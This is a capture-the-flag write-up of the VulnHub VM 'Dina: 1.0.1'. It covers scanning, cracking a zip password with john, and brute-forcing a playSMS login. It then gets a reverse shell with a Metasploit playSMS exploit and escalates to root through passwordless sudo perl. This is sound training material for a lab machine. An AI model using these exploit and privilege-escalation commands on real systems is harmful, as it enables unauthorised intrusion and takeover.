Dina: 1.0.1 [VulnHub] — Walkthrough
Hi! 👋 Today we’ll be looking at how I pwned another beginner level VM called Dina: 1.0.1 created by Touhid Shaikh on Vulnhub.
Let’s go 🏃
As always, I’m starting with the netdiscover tool to find the IP of the remote machine:
root@kali:~# netdiscover
Now let’s see the services running on the box with the help of the nmap tool by performing an aggressive scan on all the ports of the remote machine:
root@kali:~# nmap -p- -A 192.168.0.15
There is only an HTTP service running at port 80. Let’s check what inside it.
HTTP (80):
The HTML landing page didn’t give much information other than what Dina meant.
http://192.168.0.15/
Next thing I looked into was the robots.txt file:
http://192.168.0.15/robots.txt
That’s a lot of directories! I checked each of them one by one and found some passwords in the page source of one of them!
http://192.168.0.15/nothing/
Then I checked elsewhere inside the webpage but couldn’t find anything else. So I moved on to run a gobuster directory scan.
root@kali:~# gobuster dir -u http://192.168.0.15/ -w /usr/share/wordlists/dirb/big.txt
The gobuster scan result had one extra folder, called “secure”, which was not present in the robots.txt file.
There was a zip archive inside this folder. But it was password protected. So I used the zip2john tool to extract the password hash first. Then I used the john tool along with the passwords that we gathered from the webpage to crack the hash. This is how I did it:
root@kali:~# zip2john backup.zip > ziphash.txt
root@kali:~# cat ziphash.txt
root@kali:~# cat pass.txt
root@kali:~# john --wordlist=pass.txt ziphash.txt
Yay! We got the password! On extracting the ZIP and reading the content of the file inside, we get another directory name which is present on the HTTP server.

I headed to that webpage and got a login page. After brute-forcing all the passwords that we have, I got the correct one:
Username: touhid
Password: diana

There was a playSMS application deployed in it. So I checked in Metasploit if there were any exploits available for it. And there was one! So I used it to get a reverse shell.
root@kali:~# msfdb start
root@kali:~# msfconsole -qmsf5 > search playsms
msf5 > use exploit/multi/http/playsms_filename_exec
msf5 > set RHOSTS 192.168.0.15
msf5 > set RPORT 80
msf5 > set TARGETURI /SecreTSMSgatwayLogin
msf5 > set USERNAME touhid
msf5 > set PASSWORD diana
msf5 > set LHOST 192.168.0.14
msf5 > exploit

Yay! We’re in 😃
Privilege escalation was even easier since perl had sudo execution rights with no password 😁
python -c 'import pty; pty.spawn("/bin/bash");'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
root@Dina:/var/www/SecreTSMSgatwayLogin# cd /root
root@Dina:~# cat flag.txt
Hooray! 💃
The End 😄
Thanks for staying so far 😃
A clap 👏 would encourage me to write more like this 🤗. You may check my profile for my other walkthroughs. I write one every week.
You can follow me on Twitter 🐦 to get updates on all the machines that I pwn 😄.
Please mention your doubts, comments, and suggestions below.
See you in the next write-up 😄
Vale! 😃👋
